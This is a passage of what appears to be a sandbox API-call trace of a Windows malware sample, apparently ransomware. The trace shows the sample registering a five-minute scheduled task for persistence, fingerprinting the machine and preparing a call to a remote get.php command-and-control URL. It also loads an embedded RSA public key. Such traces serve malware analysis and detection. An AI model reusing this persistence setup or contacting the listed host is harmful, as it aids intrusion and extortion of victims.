(This=0x93ff48) returned 0x1 [0156.835] ITaskDefinition:get_RegistrationInfo (in: This=0x2ba08e8, ppRegistrationInfo=0x18ddcc | out: ppRegistrationInfo=0x18ddcc*=0x2ba09a8) returned 0x0 [0156.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.835] IRegistrationInfo:put_Author (This=0x2ba09a8, Author="Author Name") returned 0x0 [0156.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.835] IUnknown:Release (This=0x2ba09a8) returned 0x1 [0156.835] ITaskDefinition:get_Principal (in: This=0x2ba08e8, ppPrincipal=0x18ddd4 | out: ppPrincipal=0x18ddd4*=0x2ba0b38) returned 0x0 [0156.835] IPrincipal:put_LogonType (This=0x2ba0b38, LogonType=3) returned 0x0 [0156.835] IUnknown:Release (This=0x2ba0b38) returned 0x1 [0156.835] ITaskDefinition:get_Settings (in: This=0x2ba08e8, ppSettings=0x18dddc | out: ppSettings=0x18dddc*=0x2ba0a58) returned 0x0 [0156.836] ITaskSettings:put_StartWhenAvailable (This=0x2ba0a58, StartWhenAvailable=1) returned 0x0 [0156.836] IUnknown:Release (This=0x2ba0a58) returned 0x1 [0156.836] ITaskSettings:get_IdleSettings (in: This=0x2ba0a58, ppIdleSettings=0x18ddc0 | out: ppIdleSettings=0x18ddc0*=0x2ba0ac8) returned 0x0 [0156.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.836] IIdleSettings:put_WaitTimeout (This=0x2ba0ac8, WaitTimeout="PT5M") returned 0x0 [0156.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.836] IUnknown:Release (This=0x2ba0ac8) returned 0x1 [0156.836] ITaskDefinition:get_Triggers (in: This=0x2ba08e8, ppTriggers=0x18ddbc | out: ppTriggers=0x18ddbc*=0x2ba0a18) returned 0x0 [0156.837] ITriggerCollection:Create (in: This=0x2ba0a18, Type=1, ppTrigger=0x18ddc8 | out: ppTrigger=0x18ddc8*=0x2ba0b98) returned 0x0 [0156.837] IUnknown:Release (This=0x2ba0a18) returned 0x1 [0156.837] IUnknown:QueryInterface (in: This=0x2ba0b98, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18dde4 | out: ppvObject=0x18dde4*=0x2ba0b98) returned 0x0 [0156.837] IUnknown:Release (This=0x2ba0b98) returned 0x2 [0156.837] ITrigger:get_Repetition (in: This=0x2ba0b98, ppRepeat=0x18ddd0 | out: ppRepeat=0x18ddd0*=0x2ba0be8) returned 0x0 [0156.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.837] IRepetitionPattern:put_Interval (This=0x2ba0be8, Interval="PT5M") returned 0x0 [0156.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.837] IRepetitionPattern:put_Duration (This=0x2ba0be8, Duration="") returned 0x0 [0156.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.837] ITrigger:put_Repetition (This=0x2ba0b98, Repetition=0x2ba0be8) returned 0x0 [0156.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.837] ITrigger:put_Id (This=0x2ba0b98, Id="Trigger1") returned 0x0 [0156.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.837] ITrigger:put_EndBoundary (This=0x2ba0b98, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0156.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d8a4 | out: lpSystemTimeAsFileTime=0x18d8a4*(dwLowDateTime=0x165a5a60, dwHighDateTime=0x1d69ad5)) [0156.838] GetLastError () returned 0x0 [0156.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x39ffaa8 [0156.838] GetLastError () returned 0x0 [0156.838] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0156.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d80c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d80c) returned 26 [0156.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d80c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d80c) returned 26 [0156.840] GetLastError () returned 0x0 [0156.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x39ffad8 [0156.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x39ffad8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0156.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x354bb08 [0156.840] GetLastError () returned 0x0 [0156.841] ITrigger:put_StartBoundary (This=0x2ba0b98, StartBoundary="2020-10-05T16:06:49") returned 0x0 [0156.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a03438 | out: hHeap=0x2c0000) returned 1 [0156.841] IUnknown:Release (This=0x2ba0b98) returned 0x1 [0156.841] ITaskDefinition:get_Actions (in: This=0x2ba08e8, ppActions=0x18ddd8 | out: ppActions=0x18ddd8*=0x2ba0960) returned 0x0 [0156.841] IActionCollection:Create (in: This=0x2ba0960, Type=0, ppAction=0x18ddc4 | out: ppAction=0x18ddc4*=0x2ba0c30) returned 0x0 [0156.841] IUnknown:Release (This=0x2ba0960) returned 0x1 [0156.841] IUnknown:QueryInterface (in: This=0x2ba0c30, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18dde0 | out: ppvObject=0x18dde0*=0x2ba0c30) returned 0x0 [0156.841] IUnknown:Release (This=0x2ba0c30) returned 0x2 [0156.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.841] IExecAction:put_Path (This=0x2ba0c30, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 0x0 [0156.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.841] IExecAction:put_Arguments (This=0x2ba0c30, Arguments="--Task") returned 0x0 [0156.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.842] IUnknown:Release (This=0x2ba0c30) returned 0x1 [0156.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x39f26b8 [0156.842] ITaskFolder:RegisterTaskDefinition (in: This=0x2ba08b8, Path="Time Trigger Task", pDefinition=0x2ba08e8, flags=6, UserId=0x18d880*(varType=0x0, wReserved1=0x3a0, wReserved2=0xdd94, wReserved3=0x18, varVal1=0x420cab, varVal2=0x2c0000), password=0x18d890*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18d8a4*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18ddac | out: ppTask=0x18ddac*=0x2ba0cb0) returned 0x0 [0156.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39f26b8 | out: hHeap=0x2c0000) returned 1 [0156.998] TaskScheduler:IUnknown:Release (This=0x2ba08b8) returned 0x0 [0156.998] TaskScheduler:IUnknown:Release (This=0x2ba08e8) returned 0x0 [0156.998] IUnknown:Release (This=0x2ba0cb0) returned 0x0 [0156.998] CoUninitialize () [0157.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39fcb78 | out: hHeap=0x2c0000) returned 1 [0157.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38a178 | out: hHeap=0x2c0000) returned 1 [0157.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x389fc8 | out: hHeap=0x2c0000) returned 1 [0157.000] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x314240 [0157.001] OpenServiceW (hSCManager=0x314240, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3546838 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a02768 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a02c08 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a02e70 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a030d8 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a03340 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3a035a8 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35637b8 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3563a20 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3563c88 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3563ef0 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564158 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35643c0 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564628 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564890 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564af8 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564d60 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x354bb08 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x312700 [0157.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354bb08 | out: hHeap=0x2c0000) returned 1 [0157.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x3123b8 [0157.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x3557640, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x930) returned 0x57c [0157.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312700 | out: hHeap=0x2c0000) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffad8 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3564fc8 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565230 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565498 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565700 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565968 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565bd0 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3565e38 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35660a0 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3566308 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3566570 [0157.241] lstrlenA (lpString="http://cjto.top/nddddhsspen6/get.php") returned 36 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4a) returned 0x39f370 [0157.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3564fc8, cbMultiByte=-1, lpWideCharStr=0x39f370, cchWideChar=37 | out: lpWideCharStr="http://cjto.top/nddddhsspen6/get.php") returned 37 [0157.241] lstrcatW (in: lpString1="", lpString2="http://cjto.top/nddddhsspen6/get.php" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.241] lstrlenA (lpString="") returned 0 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b0b8 [0157.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565230, cbMultiByte=-1, lpWideCharStr=0x354b0b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.241] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.241] lstrlenA (lpString="") returned 0 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b0a8 [0157.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565498, cbMultiByte=-1, lpWideCharStr=0x354b0a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.241] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.241] lstrlenA (lpString="") returned 0 [0157.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b0c8 [0157.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565700, cbMultiByte=-1, lpWideCharStr=0x354b0c8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.241] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.241] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b0e8 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565968, cbMultiByte=-1, lpWideCharStr=0x354b0e8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b108 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565bd0, cbMultiByte=-1, lpWideCharStr=0x354b108, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b118 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3565e38, cbMultiByte=-1, lpWideCharStr=0x354b118, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b0f8 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x35660a0, cbMultiByte=-1, lpWideCharStr=0x354b0f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b128 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3566308, cbMultiByte=-1, lpWideCharStr=0x354b128, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenA (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x354b138 [0157.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3566570, cbMultiByte=-1, lpWideCharStr=0x354b138, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0157.242] lstrcatW (in: lpString1="http://cjto.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://cjto.top/nddddhsspen6/get.php") returned="http://cjto.top/nddddhsspen6/get.php" [0157.242] lstrlenW (lpString="") returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2e6098 [0157.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x288) returned 0x3a03810 [0157.242] GetAdaptersInfo (in: AdapterInfo=0x3a03810, SizePointer=0x18ddc4 | out: AdapterInfo=0x3a03810, SizePointer=0x18ddc4) returned 0x0 [0157.259] GetAdaptersInfo (in: AdapterInfo=0x3a03810, SizePointer=0x18ddc4 | out: AdapterInfo=0x3a03810, SizePointer=0x18ddc4) returned 0x0 [0157.266] GetLastError () returned 0x0 [0157.267] GetLastError () returned 0x0 [0157.267] CryptAcquireContextW (in: phProv=0x18dd94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18dd94*=0x31df78) returned 1 [0157.268] CryptCreateHash (in: hProv=0x31df78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18dd9c | out: phHash=0x18dd9c) returned 1 [0157.268] CryptHashData (hHash=0x3577580, pbData=0x3578b10, dwDataLen=0x11, dwFlags=0x0) returned 1 [0157.268] CryptGetHashParam (in: hHash=0x3577580, dwParam=0x2, pbData=0x0, pdwDataLen=0x18dd98, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18dd98) returned 1 [0157.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x3573180 [0157.268] CryptGetHashParam (in: hHash=0x3577580, dwParam=0x2, pbData=0x3573180, pdwDataLen=0x18dd98, dwFlags=0x0 | out: pbData=0x3573180, pdwDataLen=0x18dd98) returned 1 [0157.268] GetLastError () returned 0x0 [0157.268] CryptDestroyHash (hHash=0x3577580) returned 1 [0157.268] CryptReleaseContext (hProv=0x31df78, dwFlags=0x0) returned 1 [0157.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3578b10 | out: hHeap=0x2c0000) returned 1 [0157.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579558 [0157.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579520 | out: hHeap=0x2c0000) returned 1 [0157.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3142e0 | out: hHeap=0x2c0000) returned 1 [0157.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x348) returned 0x59c [0157.507] WaitForSingleObject (hHandle=0x59c, dwMilliseconds=0xffffffff) returned 0x0 [0160.600] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5a0 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffb38 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35667d8 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3566a40 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3566ca8 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3566f10 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x3567178 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35673e0 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356a0c0 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356a328 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356a590 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356a7f8 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3e0) returned 0x35e1bb8 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5ee) returned 0x3a04aa8 [0160.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3a04aa8, cbMultiByte=1518, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 495 [0160.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f0) returned 0x3a050a0 [0160.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a04aa8 | out: hHeap=0x2c0000) returned 1 [0160.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1bb8 | out: hHeap=0x2c0000) returned 1 [0160.601] CryptAcquireContextW (in: phProv=0x18de04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18de04*=0x31dde0) returned 1 [0160.601] CryptCreateHash (in: hProv=0x31dde0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18de08 | out: phHash=0x18de08) returned 1 [0160.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0160.601] CryptHashData (hHash=0x3577500, pbData=0x3a050a0, dwDataLen=0x1ee, dwFlags=0x0) returned 1 [0160.601] CryptGetHashParam (in: hHash=0x3577500, dwParam=0x2, pbData=0x0, pdwDataLen=0x18de0c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18de0c) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x3573260 [0160.601] CryptGetHashParam (in: hHash=0x3577500, dwParam=0x2, pbData=0x3573260, pdwDataLen=0x18de0c, dwFlags=0x0 | out: pbData=0x3573260, pdwDataLen=0x18de0c) returned 1 [0160.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x34) returned 0x3577580 [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="", lpString2="D0" | out: lpString1="D0") returned="D0" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D0", lpString2="08" | out: lpString1="D008") returned="D008" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D008", lpString2="04" | out: lpString1="D00804") returned="D00804" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804", lpString2="D4" | out: lpString1="D00804D4") returned="D00804D4" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D4", lpString2="8D" | out: lpString1="D00804D48D") returned="D00804D48D" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48D", lpString2="E1" | out: lpString1="D00804D48DE1") 